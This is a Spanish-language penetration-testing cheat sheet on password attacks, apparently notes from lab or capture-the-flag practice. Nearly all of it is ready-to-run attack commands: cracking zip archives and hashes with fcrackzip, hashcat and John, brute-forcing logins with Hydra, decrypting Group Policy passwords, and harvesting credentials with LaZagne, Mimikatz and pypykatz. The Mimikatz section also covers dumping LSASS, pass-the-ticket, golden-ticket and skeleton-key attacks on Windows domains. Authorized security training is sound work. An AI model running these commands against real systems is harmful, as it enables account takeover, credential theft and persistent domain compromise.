Password Attacks

fcrack

fcrackzip -u -D -p /ruta/de/la/wordlist/wordlist.txt <FILE>.zip

Cambiar contraseña de usuario

En este caso, el usuario tenia STATUS_PASSWORD_MUST_CHANGE

smbpasswd -U Caroline.Robinson -r 10.129.89.159

Group Policy Preferences (GPP)

gpp-decrypt

python3 gpp-decrypt.py -f Groups.xml
python3 gpp-decrypt.py -c edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Hashcat

hashcat -m 0 hash.txt /ruta/de/la/wordlist/wordlist.txt           # MD5
hashcat -m 100 hash.txt /ruta/de/la/wordlist/wordlist.txt         # SHA-1
hashcat -m 900 hash.txt /ruta/de/la/wordlist/wordlist.txt         # MD4
hashcat -m 1400 hash.txt /ruta/de/la/wordlist/wordlist.txt        # SHA256
hashcat -m 3200 hash.txt /ruta/de/la/wordlist/wordlist.txt        # BCRYPT
hashcat -m 1000 hash.txt /ruta/de/la/wordlist/wordlist.txt        # NTLM
hashcat -m 5600 hash.txt /ruta/de/la/wordlist/wordlist.txt        # NTMLv2
hashcat -m 1800 hash.txt /ruta/de/la/wordlist/wordlist.txt        # SHA512
hashcat -m 160 hash.txt /ruta/de/la/wordlist/wordlist.txt         # HMAC-SHA1
hashcat -m 160 hash.txt /ruta/de/la/wordlist/wordlist.txt         # HMAC-SHA1
hashcat -m 18200 -a 0 <FILE> /ruta/de/la/wordlist/wordlist.txt    # ASPREPRoast 
hashcat -m 13100 --force <FILE> /ruta/de/la/wordlist/wordlist.txt # Kerberoasting 
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u  --force hash.txt ?3?3?1?1?1?1?2?3
/usr/share/wordlists/fasttrack.txt
/usr/share/hashcat/rules/best64.rule

Reglas personalizadas

https://hashcat.net/wiki/doku.php?id=rule_based_attack

Agregar 1 a cada contraseña

echo \$1 > <FILE>.rule

Poner en Mayúscula la primera letra

$1
c

No agregue nada, un 1 o un ! a una lista de palabras existente

:
$1
$!

Regla para letras mayúsculas, valores numéricos y caracteres especiales

  • $1 agrega un “1”
  • $2 agrega un “2”
  • $3 agrega un “3”
  • c Pone en mayúscula la primera letra y en minúscula el resto.
$1 c $!
$2 c $!
$1 $2 $3 c $!

Vista previa de la regla

hashcat -r <FILE>.rule --stdout <FILE>.txt

Hydra

hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>
hydra <RHOST> -L <users.txt> -P <passwords.txt> <PROTOCOL>
hydra <RHOST> -C /ruta/de/la/wordlist/wordlist.txt ftp
hydra -l <USERNAME> -P <PASSWORDS> <TARGET> <SERVICE> -s <PORT>
hydra -l admin -P /usr/share/wordlists/rockyou.txt <RHOST> http-post-form "/login/:user=^USER^&pass=^PASS^:Invalid password"

John

keepass2john <FILE>
ssh2john id_rsa > <FILE>
zip2john <FILE> > <FILE>
john <FILE> --wordlist=/ruta/de/la/wordlist/wordlist.txt --format=crypt
john <FILE> --rules --wordlist=/ruta/de/la/wordlist/wordlist.txt
john --show <FILE>

# /etc/passwd - /etc/shadow
unshadow passwd shadow > hashes
john --wordlist-/usr/share/wordlists/rockyou.txt hashes

LaZagne

laZagne.exe all

Mimikatz

Mimikatz es una herramienta que permite extraer contraseñas en texto claro, hash, código PIN y tickets kerberos de la memoria. A su vez, también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.

# Comandos comunes
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>

# Dump Hashes
.\mimikatz.exe
sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords

# Pass The Ticket
.\mimikatz.exe
sekurlsa::tickets /export
kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-<RHOST>.LOCAL.kirbi
klist
dir \\<RHOST>\admin$

# Golden Ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd
klist
dir \\<RHOST>\admin$

# Skeleton Key
privilege::debug
misc::skeleton
net use C:\\<RHOST>\admin$ /user:Administrator mimikatz
dir \\<RHOST>\c$ /user:<USERNAME> mimikatz

pypykatz

pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam system